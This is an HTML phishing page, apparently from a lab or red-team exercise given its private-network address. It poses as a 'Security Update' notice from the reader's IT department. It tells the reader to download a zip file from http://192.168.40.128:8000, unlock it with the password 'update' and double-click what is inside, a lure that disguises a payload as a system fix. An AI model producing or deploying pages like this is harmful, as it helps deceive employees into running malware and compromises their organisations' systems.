<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Security Update</title>
</head>

<body>
    <p>Your PC is having issue with downloading and installing the latest updates.<br>
        This can negatively affect your organization's security, leaving it open to a security breach!</p>
    <p>Please a fix has be issued by your IT department.</p>
    <ul>
        <li><a href="http://192.168.40.128:8000/update_windows.zip" download>CLICK HERE</a> and download the ".zip" file.</li>
        <li>Extract the file.</li>
        <li>The password to extract the file is "update".</li>
        <li>Double-click the extracted file.</li>
        <li>Congratulations! You've successfully updated your system!</li>
    </ul>
    <p>Sorry for the inconvenience and thank you for your cooperation.</p>
</body>

</html>
